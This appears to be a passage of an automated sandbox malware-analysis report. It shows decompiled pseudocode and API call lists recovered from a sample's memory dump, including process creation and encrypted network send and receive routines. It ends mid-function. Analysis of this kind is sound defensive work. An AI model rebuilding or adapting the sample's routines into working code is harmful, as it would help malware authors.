      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 71%
    			E0039BF60(intOrPtr __ecx, signed int* _a4) {
    				signed int _v8;
    				void* _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				void* _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				short _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				char _v256;
    				intOrPtr _t128;
    				intOrPtr _t129;
    				intOrPtr* _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t137;
    				signed int* _t144;
    				intOrPtr _t148;
    				intOrPtr _t156;
    				signed int _t157;
    				char _t163;
    				char _t164;
    				intOrPtr* _t165;
    				intOrPtr* _t168;
    				void* _t170;
    				intOrPtr* _t174;
    				intOrPtr* _t176;
    				intOrPtr _t183;
    				signed int _t189;
    				signed int _t191;
    				signed int _t192;
    				signed int* _t194;
    				signed int _t205;
    				intOrPtr _t212;
    				signed int _t220;
    				intOrPtr _t242;
    				signed int _t243;
    				signed int _t246;
    				intOrPtr _t248;
    				intOrPtr* _t250;
    				intOrPtr _t252;
    				signed int _t255;
    				intOrPtr* _t257;
    				void* _t258;
    				void* _t259;
    				void* _t260;
    				void* _t261;
    				void* _t263;
    				void* _t264;
    
    				_t250 = _a4;
    				_t246 = 0;
    				_v52 = __ecx;
    				_push( &_v40);
    				_push(_t250);
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v36 = 0;
    				_v28 = 0;
    				_v40 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x58))))() >= 0 && _v40 == 0xffff) {
    					_push( &_v28);
    					_push(_t250);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x30))))() >= 0) {
    						_t137 = _v28;
    						_push( &_v8);
    						_push(_t137);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x20))))() >= 0) {
    							_t252 = E003A1D90(_v8 * 4, 0);
    							_v44 = _t252;
    							_v32 = E003A1D90(_v8 * 4, 0);
    							_t144 = E003A1D90(_v8 * 8, 0);
    							_t261 = _t260 + 0x18;
    							_t194 = _t144;
    							if(_t252 != 0) {
    								_t148 = _v32;
    								if(_t148 != 0) {
    									if(_v8 <= 0) {
    										L41:
    										_t248 = _v52;
    										_t151 =  *((intOrPtr*)(_t248 + 0x1c));
    										if( *((intOrPtr*)(_t248 + 0x1c)) != 0) {
    											E0039BB40(_t151);
    											_t261 = _t261 + 4;
    										}
    										_t152 =  *((intOrPtr*)(_t248 + 0x20));
    										if( *((intOrPtr*)(_t248 + 0x20)) != 0) {
    											E0039BB40(_t152);
    											_t261 = _t261 + 4;
    										}
    										 *((intOrPtr*)(_t248 + 0x1c)) = E003A1D90(_v8 * 4, 0);
    										_t156 = E003A1D90(_v8 * 4, 0);
    										_t205 = _v8;
    										 *((intOrPtr*)(_t248 + 0x20)) = _t156;
    										_t261 = _t261 + 0x10;
    										_t157 = 0;
    										if(_t205 > 0) {
    											do {
    												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x1c)) + _t157 * 4)) =  *((intOrPtr*)(_v44 +  *(_t194 + _t157 * 4) * 4));
    												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x20)) + _t157 * 4)) =  *((intOrPtr*)(_v32 +  *(_t194 + _t157 * 4) * 4));
    												_t205 = _v8;
    												_t157 = _t157 + 1;
    											} while (_t157 < _t205);
    										}
    										 *((intOrPtr*)(_t248 + 0x18)) = _t205;
    										 *((intOrPtr*)(_t248 + 0x24)) = 0;
    										_v36 = 1;
    									} else {
    										_v56 = _t148 - _t252;
    										_a4 = _t194;
    										_v48 = _t252 - _t194;
    										while(1) {
    											_t163 = _v20;
    											if(_t163 != 0) {
    												__imp__#6(_t163);
    											}
    											_t164 = _v24;
    											_v20 = 0;
    											if(_t164 != 0) {
    												__imp__#6(_t164);
    											}
    											_t165 = _v28;
    											_push( &_v16);
    											_v24 = 0;
    											_push(_t246);
    											_push(_t165);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x1c))))() < 0) {
    												goto L48;
    											}
    											_t168 = _v16;
    											_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t168 + 0xa4))))(_t168,  &_v24);
    											_t276 = _t170;
    											if(_t170 >= 0) {
    												E00399090(_t276,  &_v256, 0x48);
    												_t212 =  *0x3b8628; // 0x593938
    												_t261 = _t261 + 8;
    												_push( &_v256);
    												_push(_v24);
    												if( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0xe0))))() != 0) {
    													L40:
    													_t174 = _v16;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
    													_a4 =  &(_a4[1]);
    													_t246 = _t246 + 1;
    													_v16 = 0;
    													if(_t246 < _v8) {
    														continue;
    													} else {
    														goto L41;
    													}
    												} else {
    													_t176 = _v16;
    													_push( &_v20);
    													_push(_t176);
    													if( *((intOrPtr*)( *((intOrPtr*)( *_t176 + 0x68))))() >= 0) {
    														_t255 = E00397B80(_v20, 0x3b330c,  &_v12, 2);
    														_t263 = _t261 + 0x10;
    														if(_t255 != 2) {
    															__eflags = _t255;
    															while(_t255 > 0) {
    																_t123 = _t255 * 4; // 0x2080
    																_t255 = _t255 - 1;
    																E0039BB40( *((intOrPtr*)(_v12 + _t123 - 4)));
    																_t263 = _t263 + 4;
    																__eflags = _t255;
    															}
    															E0039BB40(_v12);
    															_t261 = _t263 + 4;
    														} else {
    															_t52 = _v12 + 4; // 0x8bfc458b
    															_t183 =  *_t52;
    															_t257 = _v48 + _a4;
    															__imp___wtoi(_t183);
    															 *((intOrPtr*)(_t257 + _v56)) = _t183;
    															 *_t257 = E003966C0( *_v12);
    															_t264 = _t263 + 8;
    															_t258 = 8;
    															do {
    																_t242 =  *((intOrPtr*)(_t258 + _v12 - 4));
    																_t258 = _t258 - 4;
    																E0039BB40(_t242);
    																_t264 = _t264 + 4;
    															} while (_t258 > 0);
    															E0039BB40(_v12);
    															_t261 = _t264 + 4;
    															_t259 = 0;
    															do {
    																_t189 = rand();
    																asm("cdq");
    																_t243 = _t189 % _v8;
    																_t191 = 0;
    																if(_t246 > 0) {
    																	while( *((intOrPtr*)(_t194 + _t191 * 4)) != _t243) {
    																		_t191 = _t191 + 1;
    																		if(_t191 < _t246) {
    																			continue;
    																		}
    																		goto L23;
    																	}
    																}
    																L23:
    																if(_t191 == _t246) {
    																	 *_a4 = _t243;
    																} else {
    																	goto L24;
    																}
    																L27:
    																if(_t259 == 0x400) {
    																	_t220 = _t243 + 1;
    																	while(_t220 != _t243) {
    																		if(_t220 == _v8) {
    																			_t220 = 0;
    																		}
    																		_t192 = 0;
    																		if(_t246 > 0) {
    																			while( *((intOrPtr*)(_t194 + _t192 * 4)) != _t220) {
    																				_t192 = _t192 + 1;
    																				if(_t192 < _t246) {
    																					continue;
    																				}
    																				goto L36;
    																			}
    																		}
    																		L36:
    																		if(_t192 == _t246) {
    																			 *_a4 = _t220;
    																		} else {
    																			goto L37;
    																		}
    																		goto L40;
    																		L37:
    																		_t220 = _t220 + 1;
    																	}
    																}
    																goto L40;
    																L24:
    																_t259 = _t259 + 1;
    															} while (_t259 < 0x400);
    															goto L27;
    														}
    													}
    												}
    											}
    											goto L48;
    										}
    									}
    									L48:
    									_t246 = 0;
    								}
    								E0039BB40(_v44);
    								_t261 = _t261 + 4;
    							}
    							_t145 = _v32;
    							if(_v32 != _t246) {
    								E0039BB40(_t145);
    								_t261 = _t261 + 4;
    							}
    							if(_t194 != _t246) {
    								E0039BB40(_t194);
    							}
    						}
    					}
    				}
    				_t128 = _v24;
    				if(_t128 != _t246) {
    					__imp__#6(_t128);
    				}
    				_t129 = _v20;
    				if(_t129 != _t246) {
    					__imp__#6(_t129);
    				}
    				_t130 = _v16;
    				if(_t130 != _t246) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
    				}
    				_t131 = _v28;
    				if(_t131 != _t246) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))(_t131);
    				}
    				return _v36;
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 0039C049
    • SysFreeString.OLEAUT32(?), ref: 0039C05E
    • _wtoi.MSVCRT ref: 0039C115
    • rand.MSVCRT ref: 0039C160
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 0039C2AE
    • SysFreeString.OLEAUT32(?), ref: 0039C2BC
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B0420(CHAR* _a4) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOA _v88;
    				int _t18;
    				int _t31;
    
    				memset( &_v88, 0, 0x44);
    				_v20.hProcess = 0;
    				_v20.hThread = 0;
    				_v20.dwProcessId = 0;
    				_v20.dwThreadId = 0;
    				_v88.cb = 0x44;
    				_v88.dwFlags = 1;
    				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0x10, 0, 0,  &_v88,  &_v20);
    				_t31 = _t18;
    				if(_t31 != 0) {
    					WaitForSingleObject(_v20.hProcess, 0x2710);
    					CloseHandle(_v20);
    					CloseHandle(_v20.hThread);
    					return _t31;
    				}
    				return _t18;
    			}

    APIs
    • memset.MSVCRT ref: 003B042F
    • CreateProcessA.KERNEL32(00000000,003B0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003B0468
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 003B047E
    • CloseHandle.KERNEL32(?), ref: 003B048E
    • CloseHandle.KERNEL32(?), ref: 003B0494
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 16%
    			E003A48F6(intOrPtr* __ebx, intOrPtr _a4, void* _a8, int _a12) {
    				void* _v8;
    				void* _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t92;
    				void* _t93;
    				int _t94;
    				void* _t98;
    				signed int _t99;
    				signed int _t100;
    				void* _t108;
    				void* _t110;
    				void _t112;
    				signed int _t113;
    				signed int _t114;
    				void* _t116;
    				void* _t118;
    				signed short _t120;
    				signed int _t121;
    				void* _t122;
    				int _t124;
    				void* _t132;
    				void* _t135;
    				void* _t139;
    				intOrPtr* _t147;
    				intOrPtr _t152;
    				int _t156;
    				signed int _t159;
    				signed int _t162;
    				signed int _t164;
    				signed int _t165;
    				signed int _t166;
    				signed int _t167;
    				signed int _t169;
    				int _t176;
    				void* _t181;
    				intOrPtr _t183;
    				int _t184;
    				void* _t188;
    				void* _t189;
    				void* _t190;
    				void* _t191;
    
    				_t147 = __ebx;
    				_t181 = 0x200;
    				_t92 =  *0x3b8538(0x200);
    				_v12 = _t92;
    				_t93 =  *0x3b8538(0x200);
    				_v16 = _v16 & 0x00000000;
    				_t176 = _a12;
    				_v8 = _t93;
    				_t94 =  *(__ebx + 0x32c);
    				if(_t94 == 0) {
    					L4:
    					if(_v16 == _t176) {
    						L39:
    						 *0x3b8540(_v12);
    						 *0x3b8540(_v8);
    						_t98 = 1;
    						L41:
    						return _t98;
    					}
    					while(1) {
    						_t152 = _a4;
    						if(_t152 != 0) {
    							goto L14;
    						}
    						_t113 =  *(_t147 + 0x330);
    						if(_t113 < 0x384) {
    							L11:
    							_t114 =  *(_t147 + 0x330);
    							if(_t114 < 0x1c2) {
    								L22:
    								if(E003AFB73( *_t147, _v12, _t181) != 0x200) {
    									L40:
    									 *0x3b8540(_v12);
    									 *0x3b8540(_v8);
    									_t98 = 0;
    									goto L41;
    								}
    								_t183 = _a4;
    								if(_t183 != 0) {
    									 *((intOrPtr*)(_t183 + 0x130)) =  *((intOrPtr*)(_t183 + 0x130)) + 1;
    								} else {
    									 *(_t147 + 0x330) =  *(_t147 + 0x330) + 1;
    								}
    								if( *((char*)(_v12 + 2)) != 3) {
    									goto L40;
    								} else {
    									_t56 = _t147 + 0x134; // 0x134
    									_t57 = _t147 + 0x124; // 0x124
    									_push(_v8);
    									_t108 = _v12 + 3;
    									if(_t183 == 0) {
    										_push(0x1fd);
    										_push(_t108);
    										_t69 = _t147 + 0x100; // 0x100
    										_t110 = E003A3BB7();
    										_t189 = _t189 + 0x18;
    										if(_t110 == 0) {
    											goto L40;
    										}
    										L32:
    										_t112 =  *_v8;
    										if(_t112 == 5) {
    											L38:
    											if(_v16 != _t176) {
    												_t181 = 0x200;
    												continue;
    											}
    											goto L39;
    										}
    										if(_t112 != 2) {
    											goto L40;
    										}
    										_t120 =  *(_v8 + 9) & 0x0000ffff;
    										__imp__#9(_t120);
    										_t184 = _t120 & 0x0000ffff;
    										if(_t184 > 0x1f2) {
    											goto L40;
    										}
    										_t121 = _v16;
    										_t156 = _t176 - _t121;
    										_t122 = _t121 + _a8;
    										if(_t184 > _t156) {
    											memcpy(_t122, _v8 + 0xb, _t156);
    											_t159 = _v16;
    											_t124 = _t184 - _t176 + _t159;
    											 *(_t147 + 0x32c) = _t124;
    											_t85 = _t147 + 0x13a; // 0x13a
    											memcpy(_t85, _v8 - _t159 + _t176 + 0xb, _t124);
    											_t189 = _t189 + 0x18;
    											_v16 = _t176;
    										} else {
    											memcpy(_t122, _v8 + 0xb, _t184);
    											_t189 = _t189 + 0xc;
    											_v16 = _v16 + _t184;
    										}
    										goto L38;
    									}
    									_push(0x1fd);
    									_push(_t108);
    									_t60 = _t147 + 0x100; // 0x100
    									_t132 = E003A3BB7();
    									_t190 = _t189 + 0x18;
    									if(_t132 == 0) {
    										goto L40;
    									}
    									_t135 = E003A3BB7(_t183 + 0xf8, _v8, 0x1fd, _v12, _t183 + 0x11c, _t183 + 0x12c);
    									_t191 = _t190 + 0x18;
    									if(_t135 == 0) {
    										goto L40;
    									}
    									_t162 = 0x7f;
    									memcpy(_v8, _v12, _t162 << 2);
    									_t189 = _t191 + 0xc;
    									asm("movsb");
    									_t176 = _a12;
    									goto L32;
    								}
    							}
    							_t166 = 0x32;
    							_t169 = _t114 % _t166;
    							if(_t169 != 0) {
    								goto L22;
    							}
    							_push(1);
    							_push(_t169);
    							L21:
    							_push(_t147);
    							_t116 = E003A43AE();
    							_t189 = _t189 + 0xc;
    							if(_t116 == 0) {
    								goto L40;
    							}
    							goto L22;
    						}
    						_t167 = 0x64;
    						_t175 = _t113 % _t167;
    						if(_t113 % _t167 != 0) {
    							goto L11;
    						}
    						_t118 = E003A43AE(_t147, _t175, _t175);
    						_t189 = _t189 + 0xc;
    						if(_t118 == 0) {
    							goto L40;
    						}
    						goto L11;
    						L14:
    						_t99 =  *(_t152 + 0x130);
    						if(_t99 < 0x384) {
    							L18:
    							_t100 =  *(_t152 + 0x130);
    							if(_t100 < 0x1c2) {
    								goto L22;
    							}
    							_t164 = 0x32;
    							if(_t100 % _t164 != 0) {
    								goto L22;
    							}
    							_push(1);
    							_push(_a4);
    							goto L21;
    						}
    						_t165 = 0x64;
    						_t173 = _t99 % _t165;
    						if(_t99 % _t165 != 0) {
    							L17:
    							_t152 = _a4;
    							goto L18;
    						}
    						_t139 = E003A43AE(_t147, _a4, _t173);
    						_t189 = _t189 + 0xc;
    						if(_t139 == 0) {
    							goto L40;
    						}
    						goto L17;
    					}
    				}
    				if(_t94 <= _t176) {
    					_t17 = _t147 + 0x13a; // 0x13a
    					memcpy(_a8, _t17, _t94);
    					_t189 = _t189 + 0xc;
    					 *(__ebx + 0x32c) =  *(__ebx + 0x32c) & 0x00000000;
    					_v16 =  *(__ebx + 0x32c);
    					goto L4;
    				}
    				_t7 = _t147 + 0x13a; // 0x13a
    				_t188 = _t7;
    				memcpy(_a8, _t188, _t176);
    				 *(__ebx + 0x32c) =  *(__ebx + 0x32c) - _t176;
    				_t13 = _t176 + 0x13a; // 0x13a
    				memcpy(_v12, __ebx + _t13,  *(__ebx + 0x32c));
    				memcpy(_t188, _v12,  *(__ebx + 0x32c));
    				goto L39;
    			}

    APIs
    • memcpy.MSVCRT ref: 003A4939
    • memcpy.MSVCRT ref: 003A4955
    • memcpy.MSVCRT ref: 003A4964
    • memcpy.MSVCRT ref: 003A497C
    • memcpy.MSVCRT ref: 003A4B9A
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A43DC
      • Part of subcall function 003A43AE: htons.WS2_32(?), ref: 003A43F8
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A44C5
      • Part of subcall function 003A43AE: memset.MSVCRT ref: 003A44E8
      • Part of subcall function 003A43AE: htons.WS2_32(?), ref: 003A4524
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A4B37
    • memcpy.MSVCRT ref: 003A4B5F
    • memcpy.MSVCRT ref: 003A4B75
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 56%
    			E003AFB73(intOrPtr* __esi, void* _a4, int _a8) {
    				void* _v8;
    				void* _v12;
    				void* __ebx;
    				void* _t42;
    				void* _t43;
    				int _t44;
    				int _t48;
    				signed short _t49;
    				void _t50;
    				signed int _t51;
    				void* _t52;
    				int _t54;
    				void* _t72;
    				int _t73;
    				void* _t75;
    				int _t77;
    				int _t79;
    				void* _t80;
    				signed int _t87;
    				int _t91;
    				void* _t97;
    				int _t99;
    				void* _t101;
    				intOrPtr* _t102;
    				void* _t103;
    				void* _t104;
    
    				_t102 = __esi;
    				_t42 =  *0x3b8538(0x10000, _t97, _t72, _t80, _t80);
    				_v8 = _t42;
    				_t43 =  *0x3b8538(0x10000);
    				_t73 = _a8;
    				_v12 = _t43;
    				_t44 =  *(__esi + 0x1006c);
    				_t99 = 0;
    				if(_t44 == 0) {
    					L4:
    					__eflags = _t99 - _t73;
    					if(_t99 != _t73) {
    						while(1) {
    							_t75 = _v8;
    							_t48 = E003AF4EF(_t75,  *_t102, 5);
    							__eflags = _t48;
    							if(_t48 == 0) {
    								break;
    							}
    							_t49 =  *(_t75 + 3) & 0x0000ffff;
    							__imp__#9(_t49);
    							_t87 = _t49 & 0x0000ffff;
    							_t50 =  *_t75;
    							__eflags = _t50 - 0x16;
    							if(_t50 == 0x16) {
    								L8:
    								_t51 = E003AF4EF(_t75,  *_t102, _t87);
    								__eflags = _t51;
    								if(_t51 == 0) {
    									break;
    								} else {
    									_t91 = _t51 & 0x8000000f;
    									__eflags = _t91;
    									if(__eflags < 0) {
    										__eflags = (_t91 - 0x00000001 | 0xfffffff0) + 1;
    									}
    									if(__eflags != 0) {
    										break;
    									} else {
    										 *((intOrPtr*)(_t102 + 0x10078)) =  *((intOrPtr*)(_t102 + 0x10078)) + 1;
    										_t24 = _t102 + 0x5c; // 0x105c
    										asm("adc dword [esi+0x1007c], 0x0");
    										_t25 = _t102 + 0x3c; // 0x103c
    										_t52 = E003AEF6B(_t75, _t51, _v12, _t25, _t24, 0);
    										_t104 = _t103 + 0x18;
    										_t77 = _t52 - 0x15;
    										__eflags = _t77;
    										if(_t77 < 0) {
    											break;
    										} else {
    											_t54 = _a8 - _t99;
    											__eflags = _t77 - _t54;
    											if(_t77 > _t54) {
    												memcpy(_a4 + _t99, _v12, _t54);
    												_t79 = _t77 - _a8 + _t99;
    												__eflags = _t79;
    												_t35 = _t102 + 0x6c; // 0x106c
    												 *(_t102 + 0x1006c) = _t79;
    												memcpy(_t35, _v12 - _t99 + _a8, _t79);
    												_t99 = _a8;
    												_t103 = _t104 + 0x18;
    											} else {
    												memcpy(_a4 + _t99, _v12, _t77);
    												_t103 = _t104 + 0xc;
    												_t99 = _t99 + _t77;
    											}
    											__eflags = _t99 - _a8;
    											if(_t99 != _a8) {
    												continue;
    											} else {
    												_t73 = _a8;
    											}
    										}
    									}
    								}
    							} else {
    								__eflags = _t50 - 0x17;
    								if(_t50 != 0x17) {
    									break;
    								} else {
    									goto L8;
    								}
    							}
    							goto L18;
    						}
    						_t73 = 0;
    					}
    				} else {
    					if(_t44 <= _t73) {
    						_t15 = _t102 + 0x6c; // 0x106c
    						memcpy(_a4, _t15, _t44);
    						_t99 =  *(__esi + 0x1006c);
    						_t103 = _t103 + 0xc;
    						_t18 = __esi + 0x1006c;
    						 *_t18 =  *(__esi + 0x1006c) & 0x00000000;
    						__eflags =  *_t18;
    						goto L4;
    					} else {
    						_t5 = _t102 + 0x6c; // 0x106c
    						_t101 = _t5;
    						memcpy(_a4, _t101, _t73);
    						 *(__esi + 0x1006c) =  *(__esi + 0x1006c) - _t73;
    						_t11 = _t73 + 0x6c; // 0x106c
    						memcpy(_v8, __esi + _t11,  *(__esi + 0x1006c));
    						memcpy(_t101, _v8,  *(__esi + 0x1006c));
    					}
    				}
    				L18:
    				 *0x3b8540(_v12);
    				 *0x3b8540(_v8);
    				return _t73;
    			}

    APIs
    • memcpy.MSVCRT ref: 003AFBB0
    • memcpy.MSVCRT ref: 003AFBC9
    • memcpy.MSVCRT ref: 003AFBD8
    • memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AF4EF: recv.WS2_32(?,00000000,003AF7A5,00000000), ref: 003AF519
    • htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
      • Part of subcall function 003AEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
      • Part of subcall function 003AEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF01E
      • Part of subcall function 003AEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
      • Part of subcall function 003AEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF0AA
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    • memcpy.MSVCRT ref: 003AFCA2
    • memcpy.MSVCRT ref: 003AFCB8
    • memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 79%
    			E00398370(void* __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr* _v28;
    				char _v228;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				intOrPtr* _t90;
    				intOrPtr* _t91;
    				intOrPtr* _t92;
    				intOrPtr* _t93;
    				intOrPtr* _t94;
    				intOrPtr* _t99;
    				intOrPtr* _t101;
    				intOrPtr* _t102;
    				intOrPtr* _t103;
    				intOrPtr* _t104;
    				intOrPtr* _t106;
    				intOrPtr* _t107;
    				intOrPtr _t119;
    				intOrPtr _t123;
    				intOrPtr _t127;
    				intOrPtr _t131;
    				intOrPtr* _t132;
    				intOrPtr* _t133;
    				intOrPtr* _t136;
    				intOrPtr* _t139;
    				intOrPtr* _t140;
    				signed int _t143;
    				intOrPtr _t148;
    				signed int _t149;
    				intOrPtr _t163;
    				intOrPtr _t179;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr* _t207;
    				void* _t209;
    				void* _t210;
    				void* _t211;
    
    				_t206 = __ecx;
    				_t87 =  *((intOrPtr*)(__ecx + 4));
    				_v24 = 0;
    				_v8 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t87 != 0) {
    					 *((intOrPtr*)(__ecx + 0x30)) = 0;
    					 *((intOrPtr*)(__ecx + 0x34)) = 0;
    					 *((intOrPtr*)(__ecx + 0x38)) = 0;
    					 *((intOrPtr*)(__ecx + 0x3c)) = 0;
    					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xb4))))(_t87,  &_v24, _t207);
    					__eflags = _t89;
    					if(_t89 < 0) {
    						L30:
    						_t90 = _v20;
    					} else {
    						_t99 = _v24;
